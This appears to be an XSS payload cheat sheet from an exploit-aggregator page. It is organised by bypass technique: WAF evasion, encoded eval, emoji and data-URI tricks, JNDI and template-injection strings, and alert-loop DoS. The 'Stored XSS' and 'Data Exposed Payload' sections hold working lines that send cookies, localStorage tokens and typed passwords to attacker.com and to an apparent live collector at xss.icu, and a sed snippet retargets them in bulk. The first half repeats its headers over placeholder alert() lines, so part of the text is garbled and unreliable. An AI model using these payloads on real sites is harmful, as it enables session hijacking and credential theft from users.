Share 
## https://sploitus.com/exploit?id=DA2F564D-33BB-59E8-AFA3-F5767E564DB4
## CSS Style Sheet Mutation

```
alert("This is a test")
alert("Another test")
```

## 17. Emoji Bypass

```
alert("Hello")
alert(" How are you")
```

## 18. Data URI Confusion

```
alert("Hello")
alert("How are you")
```

## 19. WAF Feature Detection

```
alert("Hello")
alert("How are you")
```

## 20. Extremely Short Payload

```
alert("Hello")
```

## 21. Storage-Type XSS

```
alert("Hello")
```

## 22. Reflection-Type XSS

```
alert("Hello")
```

## 23. XSS DDoS

```
alert("Hello")
```

## 24. Special Tags Bypass

```
alert("Hello")
```

## 25. Enterprise-WAF Bypass

```
alert("Hello")
```

## 26. Data-Exposed Payload

CSS Style Sheet Explosions

```
alert(1)

}*{color:red}//
@import'javascript:alert(1)';
*{font-family:')}*{xss:expression(alert(1))}

@import'xss.xml?import
```

## 17. Emoji Bypass

```
var ๐Ÿ–• = 1; alert(๐Ÿ–•)

๐Ÿ–•
๐Ÿ‘ถ
๐Ÿ’ฆ
๐Ÿงจ
window['๐Ÿ–•'](1)

javascript:๐Ÿ–•(1)
click
```

## 18. Data URI Confusion

```
alert(1)'>click
click
alert(1)'>
alert(1)'>
alert(1)'>
alert(1)'>
javascript:eval("data:text/html,alert(1)")
click
```

## 19. WAF Feature Detection

```
al\\u0065rt(1)

\\u0061lert(1)
\\u0061\\u006C\\u0065\\u0072\\u0074(1)


script>alert(1)//
alert(1)
alert(1)'/>
alert(1)
alert(1)
alert(1)
```

## 20. Extremely Short Payload

```
<>"'onload=alert(1)>
">
'onclick=Alert(1)>
">
eval(atob('YWxlcnQoMSk='))


Function(atob('YWxlcnQoMSk='))()

setTimeout(atob('YWxlcnQoMSk='),0)
setInterval(atob('YWxlcnQoMSk='),0)
requestAnimationFrame(()=>atob('YWxlcnQoMSk='))
```

## 21. Stored XSS

```
fetch('https://attacker.com?c='+document.cookie)


location='https://attacker.com?data='+btoa(document.cookie)


alert(top.document.domain)

```

## 22. Reflection-based XSS

```
alert(1)
">Alert(1)
'-Alert(1)-'
${Alert(1)}
{{Alert(1)}}



${jndi:ldap://xss.icu/a}
${''.__class__.__mro__[1].__subclasses__()}>

```

## 23. XSS DoS

```
while(true)alert(1)

for(;;)alert(1)


confirm('x'.repeat(1e5))

```

## 24. Special Tag Bypass

```
XSS
xss
alert(1)
XSS
```

## 25. Enterprise WAF Bypass

```
/*-/*`/*\\`'/*"/**/(/* */oNcliCk=Alert(1) )//%0D%0A%0d%0a//
window['al\\u0065rt'](1)




```

## 26. Data Exposed Payload

```
fetch('https://xss.icu/api/x/efb30de519e1?c='+document.cookie)


new Image().src='https://xss.icu/api/x/efb30de519e1?d='+btoa(localStorage.getItem('token'))
top.flag='ok';parent.location='https://xss.icu/api/x/efb30de519e1?f='+top.flag">
location='https://xss.icu/api/x/efb30de519e1?u='+encodeURIComponent(document.documentURI)

eval(atob('aWYocHJvbXB0KDEpKXt3aW5kb3cubG9jYXRpb249J2h0dHBzOi8veHNzLmljdS9hcGkveC9lZmIzMGRlNTE5ZTE+L2NvbnNvbGUnfQ=='))
location='https://xss.icu/api/x/efb30de519e1?k='+btoa(Object.keys(localStorage).map(k=>k+':'+localStorage[k]).join('|'))
fetch('https://xss.icu/api/x/efb30de519e1',{method:'POST',mode:'no-cors',body:document.querySelectorAll('input[type=text],input[type=password]').map(i=>i.value).join(',')})
```

---

## Quickly Replace Target URLs

```bash
# Replace target platform domain names in bulk
sed 's/xss\.icu/your_platform_domain_name/g' xss_payload_dic.md

# Extract only the payload list
grep -oP '(? payloads.txt
```

---

## Classification Quick Reference Table

| Classification | Applicable Scenarios |
| ---- | ---------------------- |
| 1-5 | Basic WAF, Default Filters |
| 6-8 | HTML Purification, Attribute Cleaning |
| 9-13 | Entity Encoding Filters |
| 10,14 | DOMPurify, Angular JS |
| 11 | No-Script Sandbox |
| 15-17 | React/Vue, Various Frameworks |
| 19,25 | Enterprise WAF (Cloudflare, etc.) |
| 26 | Data Exposed/Plugin Integration |

---

> **Warning**: This tool is intended for authorized security testing only.